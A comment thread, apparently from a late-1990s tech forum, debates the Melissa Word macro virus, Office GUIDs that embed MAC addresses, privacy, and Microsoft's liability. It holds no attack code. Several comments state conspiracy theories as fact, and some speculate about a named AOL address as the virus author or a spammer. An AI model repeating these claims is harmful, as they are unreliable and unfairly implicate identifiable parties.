I was just pointing out that a GUID can be generated and used in COM programming out of the blue, without connection to specific machines, users and/or any other trackable number.
And, in case you haven't noticed, the page is a joke...
The GUIDs are generated using the machine MAC address, the machine's clock time and two counter that serve to compensate for clock changes. In the absence of a network card, a value statiscally unique for the current machine is generated.
Although a value generated in a machine without a network card is unique only for that machine, given the size of a GUID (128 bits) it is unlikely that you will find many repeated ones around.
And the dial-up does not play any role in GUID computation.
And GUID in this context is COM specific, not Microsoft specific. So, any application relying on COM is likely to use GUIDs in one form or another. But no other company was found inserts GUIDs in the data generated by its applications.
Microsoft has been warned over and over by the Windows security community (which, believe it or not, is alive and well) about security issues surrounding "active" content. But Microsoft is not one company (but then again, is any) to pay attention to any outside concern that do not address it own needs.
While the evolution of Office macro language to VBA may be seem as a good thing, allowing the same code to unify all Office apps and use all features in a wholesome manner, the combined effect of VBA and the "webfication" of Office brings forth security issues far beyond a Melissa.
Think about Melissa virus as a test and about its creator as script kid. The next virus will not be so harmless(the documented effect of Melissa is the slashdotting of some mail servers and a few hard undeserved words being screamed in corporations corridors) nor will its author be so reckless.
Naturally I am assuming above that the GUID found points to right machine. Wouldn't it be funny if it doesn't? Remember, the number points to a machine. And it can easily be faked (there is even a specific C++ function in the COM API to generate GUIDs. It works in the absence of network cards).
As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certanly use this as a showcase.
It was soooo funny ... all of our "MIS" guys were running around saying other companies were shutting down their e-mail for a week and that MS itself had been it hardest. If you're using MS-WORD (in Outlook) to read yer e-mail then you've got way too much memory lying around. To fix the problem, remove some of the memory, send it to me, and use a real e-mail client ... like pine :)
Maybe the next version of sendmail will have built-in filters for extracting and deleting Word documents before they reach the internet.
I can hope, anyway.
Ita erat quando hic adveni.
Um, terrorism generally means something that causes PHYSICAL harm to someone or something. Give that this virus doesn't cause physical harm, or even do any unrepairable damage... I would hesitate to devaluate terrorism in such a way. Blowing up a building? Bombing a plane? Now those are terrorist acts. Crashing some mail servers? It's not even remotely close. If they can figure out actual damages, that would be a much better punishment as far as fitting the crime.
-Just because we can doesn't mean we should.
Leilah
~ Leilah
Ditto.
I figure that if I wanted to I could write this stupid virus in under 20 minutes (PLUS some other features). I've done enough stuff with VBA and MAPI to do this in my sleep. Guess I don't have the inclination to write a virii...
Virii aren't what everyone makes them out to be anymore. I remember old virii that were written in assembler (and used some pretty damn cool tricks), but now they are written using VBA (ROFL).
Justin
Mu. P.S. The address you see is real. =)
Quoting Masem:
While I am probably being paranoid and overly sceptical, it's way too convinent that the Win98 ID bug, only uncovered recently, is suddenly going to be the life saver for solving the Melissa problem.
The M$ GUID will not solve the Melissa virus from spreading. That will go on as long as one person has not taken the proper precautions.
All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).
Actually, the GUID creates more problems. If you want to help solve crimes in a similar manner, it would be beneficial to have wire taps and other eavesdropping devices in everyone's home. That way, if anyone in the United States mentions terrorism, they can be promptly arrested for plotting terrorist acts.
All the GUID is is Big Bro looking over your shoulder. That's not a comfortable feeling for me.
This latest development will certainly put privacy issues in regards to electronic forums to the forefront again.
~afniv
"Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"
~afniv
"Man könnte froh sein, wenn die Luft so rein wäre wie das Bier"
Richard von Weizs
My question is: Can Microsoft be held legelly resposible for allowing this to happen. It is there neglegence in writting programs that allows Word macro virii like Mellisa in the first place. I can't think of anything better than seeing MS get into more legal trouble, but there is also the issue of what kind of precident this would set. If MS were to get sued for writting bug/feature filled software than so could everyone else.
Anyone notice the Linux icon on the reffered to web sites front page?
I can just hear it now:
Melissa virus propogated by malicious Linux hackers.
Something I would't put past those idiots over at Zdnet.
********************************************
Superstition is a word the ignorant use to describe their ignorance. -Sifu
it came from AOL.
Sure. And my three year old nephew figured out how to install Windoze without adding the bugs.
(sigh, why am I always the guy who is trying to stop the lynch mob.)
Note that Microsoft promptly released a patch for this problem, soon after it was publically announced.
As for "buried in their website", I hardly call http://officeupdate.microsoft.com/word/ buried.
If Microsoft is going to be damned on this one, it's for unleashing a full programming environment on 90% of the word processor users out there who have absolutely no need for it. The small number of people that do use MS Office based macro applications could be bothered to run a seperate installer to get the VBA environment. Of course a groupware package like Outlook needs a programming environment, so maybe Microsoft should take a look at how Lotus Notes minimizes/elimiates this problem (through a certificate infrastructure).
--
Business. Numbers. Money. People. Computer World.
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
It would be almost trivial to recreate this kind of virus in Lotus Notes. Yet it's largely unheard of, despite Notes being the #1 commercial e-mail system. (I'm saying this not to encourage anyone, but to get Notes users to tighten their systems.)
The one protection that Notes gives you is that all code is cryptographically signed, and the user or administrator can define the rights code have depending on it's signature. In a properly set up environment, Internet orginated Notes macro viruses don't have a chance. However, many Notes shops have not implemented this feature.
Eudora/Outlook Express/Pine/etc. don't really have a automation interface to speak of, so they are probably relatively immune. I'm not an emacs wiz, but it may be possible there due to the lisp interpreter, although I doubt anyone would bother.
--
Business. Numbers. Money. People. Computer World.
http://msdn.microsoft.com/library/specs/richtex
--
Business. Numbers. Money. People. Computer World.
Can you say for sure that Groupwise/Wordperfect is immune, or just that nobody really cares about writing viruses for 3% of the market?
In the old days, there were WordPerfect and 1-2-3 macro viruses. I don't think anythings technically changed to stop them.
--
Business. Numbers. Money. People. Computer World.
What kind of moron receives an attachment without warning, opens it, and then runs the macros? If you're going to do that, you deserve all that you get.
-lx
I could easily see the creator getting away with it. Depending on the manner in which the news of the GUID case was broken. If they published it before the FBI could get a search warrant, they'll have no hard evidence. Unless AOL is able to produce logs of his email, phone records confirming it, etc. All he needs to do is say that someone hex edited the files to frame him. It is entirely possible and certainly this enters within the domain of reasonable doubt.
> Why would Microsoft publicise the risks of using its over elaborate technology?
Sadly enough, exactly one of the many mainstream press stories I saw/heard on the subject even mentioned MS at all (one of two NPR bits).
If all your information came from the mainstream press, not only would you not know that it's MS's fault, but you wouldn't know what the vulnerable setup was so you could take precautions.
And face it, unless you happen to be interested in Random Topic X, all your information about Random Topic X comes from the mainstream press. Given that I cringe every time I encounter a news story about something I've got a small clue on, shouldn't I worry about believing them about things I don't know anything about? You bet!
When you say that "we have absoultely ZERO privacy online" are you referring to we as "that group of people who uses software whose source code is a secret"?
You see, I ask because those of us who use software whose source code we can (and actually do) examine, would not have any GUID or other ID sent in our emails and documents without our knowledge. Thus, this incident proves nothing about our privacy.
Oh, yes, and I also have the ability to change my MAC address. So, whoever it is you refer to as "we", you should try getting a new NIC and a new document processor (ditch Word in favor of LyX or something).
If you go to the web site:l
http://www.sourceofkaos.com/homes/vic/index.htm
which as been closed down, you will see pages
like o2000.html (office 2000), psd2000.zip,
and a file called Xlmacr8.zip... looks like
a macro to me. I dunnoooo........
linuxnewbie.com
ok so they're may not be a unique identifier on the copy of office they have, but its the MAC number on the nic which whill bite them in the ass. there are some nics that can be changed, but this person's not all that bright. obviously NOT a /.'er
...was the subject of an I got yesterday morning. "How extremely convenient," I thought. "How very fortunate we are that MS is looking out for us, providing a fix almost before we even knew there was a threat."
Reminds me of a story I know where the alleged "criminal" is tricked by the "victim" into implicating himself to the authorities before the crime takes place. ("An Inspector Calls")
Of course, you're only vulnerable if you're running Windows. So, it's an HTML-borne virus that makes use of a Windows security hole. Doesn't matter if you have armor plated walls if the foundation is rotten.
The FBI is upset?
The FBI scared out of "malicious hackers"?
The FBI, should be scared out of itself.
What a stupidy.
There are so many levels that it the FBI's FAULT,
1. They use MS Office (which is known to have security faults)
2. They opened up the message with the suspicious subject
3. They opened the doc attachment with word
4. They agreed to use the macro.
they had 4 mistakes, leading to the virus.
don't blame the cracker, blame yourselves,
you were idiots enough to be infected,
you are going to pay for this.
(yes bluescreens are the users fault, they DID buy windows)
---
---
I'm going to live forever, or die in the attempt.
I have an idea.
lets expose a major security hole in one of our products,
to let everyone see that GUID is a good thing.
hell, they made security holes in purpose to make GUID useful.
They planned it all along, ofcourse,
they knew GUID would be exposed, so made it possible for them to say:
"You need GUID because our products are bad and have many exploits for crackers to play with"
it reminds me when Microsoft bragged that NT servers had failsafe modes,
and when a server crashes,
another server can replace it.
If NT servers didnt crash so often nobody would care.
---
---
I'm going to live forever, or die in the attempt.
Tomorrow they'll use it to hunt down a "criminal" who disagrees with the Chinese government.
> All software is broken.
at least now we really now for sure that we have absolutely ZERO privacy online. have fun people!! long live e-commerce and credit card numbers flying all 'round!! viva big brother!!
have i mentioned lately that our prying gov't is lame?
"All that glitters is not gold"
because of the publicity regarding the UID's, anyone smart enough to engineer this type of thing would be smart enough to be able to cover their tracks.
That's true, assuming that the writer a) knew about the GUID's and b) was actually competent enough to spoof it. Since Melissa was created before the GUID's became common knowledge, he probably didn't know about the ID. As far as competence is concerned, you don't need to know anything about MAC addresses to write virii, especialy in VBA.
But, you're right. Whether the guy wrote it or not is irrelevant. A MAC-based ID is not a unique identifier, and to treat it as such is more irresponsible than authoring the virus in the first place.
-tak
How much you wanna bet that the ethernet card that created the file in which the virus was embeded is presently either a) ash or b) under several feet of water.
I had the same thought last night especially when the news came out about the 'tracking'. I mean, how hard is it to forge the GUID, right?
Of course not only can you get creamed for programming, you also can get it for downloading, even connecting...
I would think that there are some first-amendment type issues when were talking about programming though, right? I mean, its one thing to write it, another to deploy it.
Funny, one of the things that Microsoft's GUID is built from is, in fact, the ethernet ID.
If you've ever run any of the multi-media SW that I helped write back in the early 90's (not likely, but still) you've had non-network software look at your ethernet ID. Run Mathematica? it looks at your ethernet ID to build its $MachineID. Countless other programs do. Read the article again.
Whew- taking this a little personally aren't we? Keep telling yourself "It's only a multi-billion dollar company, it's only a multi-billion dollar company..." over and over again until you are "clear" (scientology speak)
You would think that Exchange server administrators would be smart enough to at least start filtering attachments or running a virus scan on incoming traffic. I guess not, since M$ themselves were offline yesterday...
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... why motivates M$ to deliberately ignore them?
It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.
Conspiracy theories, my ass. More than enough evidence to go on here.
"Kinky sex involves the use of duck feathers. Perverted sex involves the whole duck." - Lewis Grizzard
I'm not sure if use of such GUID's would hold up in court since it is private information gathered by an illegal search. The user did not give permission for his unique ID to be attached to his .doc file. The app (Word) had no just cause to attach this ID either so it's similar to having the feds tap your phone without a warrant.
That's not a good analogy. It's not an illegal search if someone looks in a document that you created and distributed for a GUID. Just as it's not a problem for the Gov't to take fingerprints off a letter that you sent or DNA samples from the saliva you used to lick a stamp or an emvelope shut. Once you voluntarially give something up, it's fair game for the man.
Perhaps a real issue in a court would be how easy is it to forge a GUID so that it looks like the document came from someone else.
I have discovered a truly marvelous sig, unfortunately the sig limit is too small to contain i
You can only voluntarily give up something you KNOW you have ... the unknown data attached to it without your consent by a 3rd party should not fall under these same rules.
I'd like to say that you are correct, but (for ill or good) legal rulings hold otherwise. The FBI has taken saliva samples from a coffee cup that they gave to someone who was being interrogated and had those samples admitted as evidence. Surely the perp didn't know that they could do that. It follows the same legal theory that having voluntarially given up something places it out of the realm of illegal search and seizure. Unfortunate but true.
I have discovered a truly marvelous sig, unfortunately the sig limit is too small to contain i
ABC news reported this morning on their radio coverage (as lately as 10pm EST) that the FBI had traced the emergence of the virus to somewhere in Europe, with no mention of AOL, unique IDs, etc.
;)
I would say that ZD and ABC are reporting different information. Is the FBI throwing nonsense to ABC? Does the FBI know about the AOL trace (one would think so)?
Well, whatever. My linux boxen somehow don't appear in the "Address Books" of MS-only users, so I guess that's a blessing. I'd hate to have to read the virus document safely and just delete it
roundeye
"Cause there's 40 different shades of black, so many fortresses and ways to attack, so why you complainin'?"
Fact of that matter is that back when all the big fuss about all this came out I wrote a program to remove them and/or replace them. Whomever wrote Melissa could have easily used my program, Guideon to replace the IDs.
For that matter they could have done it by hand with a simle hex editor. It would be all too ironic for one hacker to frame another, but it's hard to believe that he/she would not be following this GUID issue.
So in order for it to stand up in court there's going to need to be some other evidence to prove that this individual really did it.
While I like the rest of them would like to see virus writters brought to justice, we *CANNOT* convict people on easily falsified evidence alone.
Your own post even shows how clueless you are: RTF files created in Word 6.0 (and later) for the Macintosh and Power Macintosh have a file type of "RTF."
Versus what we're talking of as a .doc.
What if MS created the worm/virus in order to justify the GUID that is drawing heat from many people. How convenient is this timing of events? I find most coincidences aren't.
I'm not saying this is the case, but you sometimes have to wonder...
What if MS created the worm/virus in order to justify the GUID that is drawing heat from many people. How convenient is this timing of events? I find most coincidences aren't.
I'm not saying this is the case, but you sometimes have to wonder...
BUT, with the FBI (and possibly several other departments of the govt), major partners of Microsoft (Intel, Compaq), major customers etc involved. I would doubt MS would be that moronic. Not that they have a good track record, considering their trial performance, but I doubt it.
This is the worst kind of bloat I can imagine - a fancy text editor mated to a BASIC interpreter. Granted the usefulness of an integrated development environment in your word processor, it is doubly insane to permit programs to run automatically when the document is opened. While it is possible to disables macros in Word, this is not the default. 90% of users don't use macros (unless they are infected), so why couldn't MS change just one bit in its ditribution from ON to OFF and do some serious good toward slowing the spread of macro viruses?
The really sad thing is you can't sue them. They create an obviously deficient product, one which they could easily have changed to prevent material harm to their customers, yet they are not liable. But let somebody pour coffee all over their genitals, and Ronald McDonald is paying to the tune of $n*1E6.
It's not hard at all. The GUID is stored as cleartext (!) in the Office documents. Open one of yours (if you don't have one, you can download a template from Office Update). For instance, the person who put together the PowerPoint "Project Overview" template has this GUID: {DB2F2831-22EE-11D0-BC57-00805F883DE4}. For those who are interested in conspiracies, you should rewrite the last part as 00:80:5F:88:3D:E4. That's right: The GUID contains the MAC.
Websites access this by an ActiveX control in your %WINDIR%. Microsoft accesses it so that they can put it in your microsoft.com cookie. You can read about this, and how to disable the control, at Winmag.
Mike
--
Mike
--
"Wi nøt trei a høliday in Sweden this yër?"
Mike
--
Mike
--
"Wi nøt trei a høliday in Sweden this yër?"
His AOL profile is full of valid information (he's a civil engineer in Lynnwood, WA and owns an AST).
Whose brilliant idea was that! Oh well. Anyone dumb enough to post a 'virus' with they're own e-mail address should get whatever they throw at them. Social darwinism. :)
There is no way that he is the real author. Virus authors do not fill their profiles with valid info. The poor man was spoofed. 5cr1P7 k1DD13z put things like '31337357 h4x0R d00d' in their profiles.
Damned irresponsible reporting's what that is.
Mike
--
Mike
--
"Wi nøt trei a høliday in Sweden this yër?"
Mike
--
Mike
--
"Wi nøt trei a høliday in Sweden this yër?"
What's really laughable is this patch. It simply changes Word so that when you open a document with a macro, Word says "This document contains macros. Would you like to disable them?" It gives no clue what effect these macros may have. This is a fix?
Mike
--
Mike
--
"Wi nøt trei a høliday in Sweden this yër?"
I can hardly wait until Microsoft uses this to "justify" recording computer IDs, as well as having GUIDs put into their Office documents.
Methinks I'll go convert all my old Office documents into RTF.
if i were the type of person to build a virus, i'd make a point of embedding Bill Gates' GUID in it.
that'd be an interesting research question. what is Bill's GUID?
Then we can attach it to every Word document that we see.
Shoot, I've already got my career chip. When I found out that I was doomed to be a Visual Basic programmer I cried myself to sleep. Now I've got to wait until 2008 for the invention of the suicide booth...
Hmmmm, maybe there will be an opening in Microsoft's macro virus development division pretty soon. Shoot after the DOJ breakup, I could make a killing in stock options when they spin off it off as a new company.
Thought Patterns of Everyone in my office:
Of course I want to enable macros from this unknown recipient... enabling good... macro virus...? That's not related to enabling macros is it... what they spread through email...? I'd better email everyone and warn them that I've got this virus.
uh oh, there's a macro virus running around... Of course I want to enable macros...
Conscience is the inner voice which warns us that someone may be looking.
-- H. L. Mencken
I'd have to agree, the poor bastard that owns SkyRoket@aol.com is toast. Whose brilliant idea was that! Oh well. Anyone dumb enough to post a 'virus' with they're own e-mail address should get whatever they throw at them. Social darwinism. :)
Still M$ getting off pretty easy on this one. That sux. God forbid they focus on patching the gaping hole this walked through! Oh well. And to think there was no-anti M$ messages in the think. What a waste. Something as simple as 'Aren't you glad your system is one big fucking lump of code?' would do.
microsoft *is* the car manufacturer making the memory hogging monsters for more than a decade.
I agree with what you say in general principle, but it does make me very uneasy. It's the first step down the proverbial slippery slope.
It's a very small step, IMHO, from poor design to bugs in a program. They're really just bugs of a different kind (a design bug vs. an implementation bug).
And if a software writer can be sued because of bugs in their program...?
It's one thing if they knowingly left bugs in their program that could be exploited without telling anyone, but quite another to prosecute/sue people simply for having bugs in a distributed program, whether they sell it or not. (If this isn't what you're getting at, I apologize; it just sound's like it to me).
I do not like micros~1, for many reasons. However, this is not one of them. It scares the $#!+ out of me to think that someone could bring a lawsuit against me simply because of some bugs that happened to be in my program that I didn't catch. After all, it is extremely difficult, even impossible, to be sure you have eliminated all bugs in a program. Of course, I will do my best to fix the ones I find, but some will remain, undetected by me. And some of those just may be serious; I won't deny that possibility.
No, I tend to think that limited liability for programmers is a good thing...
--
- Sean
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
Maybe someone will figure that if they make an example of one cracker, others will be "scared straight".
Sounds suspiciously like what they tried with Kevin Mitnick, to me...
--
- Sean
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
No, yet another proof of workplaces dictating what their employees use.
I use office and outlook (ok, I'll use lowercase). Not because they're good. Because I'm told to.
--
- Sean
It's a fine line between trolling and karma-whoring... and I think I just crossed it.
- Sean
There are those of use fored to use Exchange/Outlook at work, and I found 15 of those bloody emails in my box yesterday morning.
I never thought I'd be wishing we didn't convert from CC:Mail. (see, Outlook was a major improvment..)
Remember how, Outlook only SPREADS the virus, anybody running Word/Office with ANY Email program can get infected and spread the virus manually.
Go ahead and use Endura, but if you have Word/Office, you still get infected if you open the doc.
Do a little more reading first..
If you open the doc, it infects the normal.dot document of Office/Word, and forward it to 50 people in your address book w/ your name from the registry.
If you have another email program, and you open the document that you recieved, you are still infected, but you don't automaticly spread it. BUT, any document you open and save from then on is infected, and any of them you forward to others will infect them. Plus, if they have Outlook, they start the automatic propergation again.
Newsgroups tend to generate intensive grudges.
Sheesh, evil *and* a jerk. -- Jade
They make this "Virus" (Why I quoted becuase I don't call this types of scrips a real virus) to be sooo dangerous.. It's just that it's annoying, like every Macro 'Virus'.. OutLook is terrible.. I only use it when I really need it.. But I use mostly the mail package in Netscape....
I ate my tag line.
-=Ellis (D)25=-
Well, any positive benefit from that would tend to be outweighed by the outages and downtime caused by the virus... a virus that only affects someone running Microsoft Windows, Word and Outlook. (Though maybe if you have Eudora or something and open the attachment, your Word can still get infected; it just won't spread automatically like it will with Outlook.)
--
Do I look like I speak for my employer?
This just proves that most users aren't even aware that there are applications other than outlook and office (lowercase, pease). If users had made a choice and used whatever mail client they tried, the Melissa Virus would not have spread so quickly.
The Spread of the Melissa virus is generating
*much* more publicity in mainstream media channels
than the GUID issue. Sure, if the GUID helps find
the perpetrator, this will be publicized, but much
of the public won't understand it. What they will
understand is that Melissa (and similar viri)
continue to spread via their Microsoft software.
The negative PR would far outweigh the positive.
This will only work once. Now that this is so
well publicized, the next time someone creates a
Word virus, they'll strip out the GUID. This
doesn't really solve their security problems.
A minor point: macro virus protection IS, in fact,
a default option in Office 97: you have to give
the drones at M$ the credit for that. Even if
it looks like Macro Viruses originated from a
disgruntled MS Employee. . . .
Ok, I might just be a predjudiced SOB, but I'm always shocked when someone is able to use a MS app to do anything useful.
I would like to make some points about Melissa. 1) As far as viruses go, Melissa was lame. Any body remember the Manilow Virus? I was hit by that, and I laughed until I found out that my HD was wiped clean. Ouch! Now that was a malicious virus. But Melissa just sends out e-mail messages to people in your address book, 50 for the sake of argument. I am a sysadmin for over 500 windows users, and I would bet you 4 of them know that they have an address book much less use it. And if you never open the attachment, nothing happens. And who opens attached files from people they don't know? I sure as heck don't. Any one who actually opened Melissa would have most likely opened the darn thing if it was called "I'll screw up your computer.exe"
The more dangerous thing that is happening is that we are now creating a new "Super Cracker" here that will be basking in the attention of his script kiddie peers. And worst of all he's a lamer. He can't even write a decent virus. (Attention /.ers, I do of course realize that there will be a Jon Katz article tomorrow about his trials with the Melissa "Super Virus" that threatened to ruin X-mas by making you read doofy e-mails that resemble porn spam, causing you to overcook your turkey right on the big day.)
Where was I? Ahhh... Yes! So, this lame VB scripter writes a lame VB virus, and turns it into an alt.sex ually transmitted disease (forgive the pun) and gets caught by some lame GUID. The fact is that he probably wanted to get caught, so that he could gloat about it. The first question that he asked his attorney was probably this, "So will I get on 20/20?"
I hate to be sue happy but.... If M$ thinks they can use their ID's then they diserve another lawsuit. Sue for slander / invasion of privacy.
Tip: Any one that created the virius should toss any thing M$ they own and install Linux on all of their machines.
When Melissa was released, no virus scanners could detect it. Sure we could just strip all attachments, but the upper management tends to get mad at stuff like that :-)
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
Um, well, it won't pull names from an Eudora client, but it will still happily start outlook and see what it can find in there. And that's just based on what the writer wanted to target (there ARE more outlook clients installed than Eudaora, after all)
Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... why motivates M$ to deliberately ignore them?
Here we agree. They claim it's to allow third part developers a chance to extend the office suite, I think it kinda blows :-)
It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.
Conspiracy theories, my ass. More than enough evidence to go on here.
Back to the debate of whether PGP signing is useful if it's not mandatory. Don't wanna go there...
Can anyone remember a short while (couple of years) when MS-DOS 6.x came out, factory-equipped with Screaming Fist ? Am I the only one that sees a pattern of product release / virus / product release / virus from the dark side ? They might not be the ones responsible for the virus, but where I come from, the guy that sells the gun to the guy that shoots the other guy is about as guilty as the guy who actually shot the other guy. (Ok this is confusing.)
Sun Tzu must have been running Linux...
- Hold out baits to entice the enemy. Feign disorder, and crush him. (Sun Tzu, The art of war)
Marriage is considered capital punishment for the theft of a goat in some third world countries...
Can you spell "user-space" ? Unless you run emacs as root (running anything as root unless explicitly necessary is stupid anyways), the only damage Lisp code could do is to your own stuff... Not bring the whole mail server down to its knees (Sendmail is tougher then Exchange, we now have proof.).
Sun Tzu must have been running Linux...
- Hold out baits to entice the enemy. Feign disorder, and crush him. (Sun Tzu, The art of war)
Marriage is considered capital punishment for the theft of a goat in some third world countries...
"If they find the writer of this virus,
I think the writer of this virus should be fined
the cost that it takes to remove the virus
from all infected computers, plus the associated
cost for lost work, plus they should be jailed
for life."
i think this guy has a bit of a chip on his shoulder.
of course people wouldn't be having these problems if they were running linux:)
hmmm.... The timing of these incidents seems a little too coincidental. "If it wasn't for those GUID's secretly embedded in MS Office documents, we may have never tracked down this evil perpertrator", says Joe Researcher, on his way to the bank to cash in his check from billg. "Thank goodness for GUID's!"
or maybe i've had too much coffee this morning - my paranoia settings could need some recalibration.
As a general, wide-sweeping software design idea, I think scriptable programs are a Good Thing. This pretty well necessitates "executable documents" assuming that you want to carry macros back and forth. The problem is with invisible, automatically-executing macros (or invisible, automatically-executing code in general). Adding more functionality to a program (a la Emacs) really helps in customization, and is a good design choice. The problems of word macros are the same design flaws that lead to insecure operating systems and programming languages.
"Whatever happened to fair use?"
-- Duff-Man
It's all fine and dandy that they traced the stupid virus, but it really sucks how they did it. Now we are gonna get all sorts of people screaming and yelling that GUID's are an excellent idea.
So is it possible for the creator of the virus to sue Microsoft for invasion of privacy?
--
Once you unwrap the lollipop of mediocrity, you'll be sucking on it forever. -- Matt Jannusch
Need Free Juniper/NetScreen Support? JuniperForum
Making it a crime to "create a virus" is very bad idea.
Releasing a virus, esp. with the intent of causing harm is a different story, however...
The difference here is that big tobacco spent lots of time, money and marketing know-how to figure out how to best sell poison to people.
It's as is a software company went out and marketed an insecure, buggy operating system as an "enteprise solution", all the while knowing that it exposed users to all sorts of risks...
perhaps we've got a lawsuit here ;)
5-10 years and $350,000? What the f*ck is that? Maybe Microsoft should be slapped with a class action lawsuit for setting up the infrastructure that allowed this virus to spread.
That's like saying Ford should get sued when there's a hit-and-run, or HP getting done when I run out of paper in my printer and miss a deadline, or tobacco manufacturers getting sued when someone dies from smoking Marlboros.
Oh bugger. I just disproved my point. I'll shut up now. =)
If Ford (for example) sells you a car without door locks, or an alarm, or an engine immobiliser, etc and it gets nicked, who would you blame? Who would "the public" blame?
My Aus$0.03. (US$0.02)-- open source? sounds like the real book --
Having read the article I can't help wondering how hard the original virus writer would find it to change the GUID in his original file. If someone can extract the GUID from files on a website what is to stop the original author creating the original infected document and then changing its GUID to that belonging to a different instance of Office. And given the prevelence of AOL free membership CD's and the ease with which a poster to USENET can fake their address is it any wonder the original source appears to be an AOL (l)user.
Kithran
I don't care about that stupid virus as much as I care about what M$ has done to invade peoples' lives. M$ is the criminal here, not the punk who will take the fall.
The first thing I thought when I saw all the press about the melissa "virus" (yes .. i know) is that perhaps this was released as publicity by someone .. maybe Norton or CA.
.. i don't know .. usefulness?
.. and remebering the controversy over GUID's quite recently .. maybe it wasn't Norton or CA who created it, but Microsoft itself? Now of course I know that MS is not stupid enough to relase this /themselves/ , but I'm QUITE SURE they wouldn't have a problem allocating a "black budget" for this these types of things to be funded.
.. its like a wave .. anyway) :
It is a WELL KNOWN FACT that antivirus product makers have historically released viruses into the wild to "boost" their products
Well I had that thought the other day. And now today, reading that they supposedly "tracked" the creator
IN FACT.. most people probably don't remeber unless reminded this (and this is what pisses me off about MS, they have done SO MANY EVIL THINGS, but they space them out just far enough to where people don't remeber one from the next, so our anger can never peak
Remeber a while ago it was uncovered that Microsoft had made plans with their PR agency to create a false grassroots support campaign for them? They PAID OFF national, prestigous journalists to write articles supporting them. They paid prominent people to write letters to the editor of newspapers. Fortunately this was uncovered in time to embarass them and to prevent them from unveiling this plan on a large scale. But those of you who are skeptical that this is a conspiracy.. please remeber that MICROS~1 has demonstrated in the past that this type of thing is not below them.
Additionally, who would better think to exploit the vbscript in word 97 other than a Microsoft engineer? Don't be foolish, their engineers are QUITE intelligent, its just that management beats them down. They have HUNDREDS of world-class programmers working for them, but unfortunately they are not allowed to do "what's right," they have to do what management says (cf. Win 3.1 compatibility in Windows 95 [and other 16 bit code]). I can see a microsoft engineer coming up with this idea.
It all in all smells quite fishy to me. We will see how it pans out, but my prediction is that no one will ever be caught
An ethernet card created the file?
There's no reason to assume that whoever created the 'virus' even had an ethernet card. Even if he/she did, there's no real relation between the Ethernet GUID and the word GUID here. And as far as I know, no non-network application software currently looks at ethernet IDs.
I coulnd't agree more, I just think that the "executable" part of documents should be about document contained data. I mean, a script inside a document should only be able to look and change data contained in the original document.
The problem is that VB and Active X gives you to much power from inside a document, and I don't think requiring a signature is enougth, since most of people (dumb people, but people) simply accept what ever dialog pops into their faces.
[]'s Victor Bogado da Silva Lins
^[:wq
Mailissa IS stupid. It's a non-virus that (at worst) can cause a DOS against inadequate hardware running an inadequate OS running an inadequate mailserver program. For this to work, you must also have many clients running M$ Office.
In short... who cares!!! Is it the "Virus That Ate MCI" or the new ADM worm for Linux? No, it's a stupid Visual Basic macro that's the latest in a series of thousands.
Is Rob a nasty hideous censor for calling it stupid? Duh! If you run M$ exchange with M$ office clients, you are subject to macro "viruses". This is extremely old news. Sign me up for a double-yawn!
Like this is the first DOS against Exchange, or the first annoying macro "virus" (Faithful Bugtraq readers may officially chortle here). Get a life! The only reason that this macro is being talked about is that some loser at CNN picked it as a career move.
Move on!
--Sync
Very true. MS actually owns the RTF spec and you
can search far and wide for a published specs on
this language and you won't find much. MS has a
white paper on the subject but it hasn't been
updated for YEARS. I did a project which used RTF
and recall talking to MS support about RTF issues.
They don't even support this standard anymore.
I was given the white paper and brushed off.
The problem is that VB and Active X gives you to much power from inside a document, and I don't think requiring a signature is enougth, since most of people (dumb people, but people) simply accept what ever dialog pops into their faces.
No kidding--one job I did was for an office where people blithely clicked "OK" without ever reading what was in the dialog ("Do you want to delete all records? OK!"). It took a bit of social engineering to get around this--in the end we designed dialog boxes that required a typewritten reply to perform catastrophic functions (like deleting records etc.) "You are going to delete all the records. Type in the third word of the second sentence in this box to confirm that you want to do this." While this would have driven me nuts if I had to USE this application it was the only way to keep them from shooting themselves in the foot on a regular basis (and then calling me for tech support afterwards!).
-----------------------
To understand recursion, one must first understand recursion.
This is absolutely true. The GUID, as I understand it, is built at install time and written to the registry. It will not be re-written when a network card is changed. Also, as is often true in the corporate I.S. world, a bunch of machines can be 'cloned' via Ghost or a similar utility from a master image. These machines all inherit the GUID present in the master image. This is a problem I've seen first-hand.
Ah, perhaps I should have specified more what I meant by "executable". I don't mean scripting stuff (though I do, indeed, feel that JS is evil). I think scripting is just fine, when all it does is affect the presentation, layout, and effects of a document. But when a document executes code that is independent of the document (like a mail merge that goes and gets addresses from Outlook), it's no longer a document - it's a program.
And just like you shouldn't run any program someone emails you, you shouldn't "run" a document someone sends you. I wouldn't worry about an HTML document, because it doesn't fall under my definition of executable (plus I keep JS turned off).
The problem with M$'s documents is that they just don't put limits on it. A document should be in it's own little sandbox and shouldn't leave it. If you want to do mail merges and such, add that module into outlook or a seperate executable - don't wedge it into the Word format!
--
--
Jason Eric Pierce
Actually, we don't (in the States). An unauthorized search and seizure is one of the easiest ways of getting evidence thrown out in a U.S. court.
--
--
Jason Eric Pierce
Interesting opinion. I think it's pretty interesting, considering it points out how M$'s shoddy products lead to security holes. Granted, the
Executable documents are just plain wrong.
--
--
Jason Eric Pierce
Sorry - the e-mail address is skyroket@aol.com (without the 'c' in 'rocket').
Man, if that's the case, I'd doubly hate to be skyrocket@aol.com tonight.
Just doing a quick search on dejanews, I found about 50 posts by skyroket@aol.com...but they were all from 1997, and all on sex newsgroups. It looks like he was a spammer. Most likely the virus' author was a regular on one of those newsgroups and has an aversion towards spammers (who doesn't?)
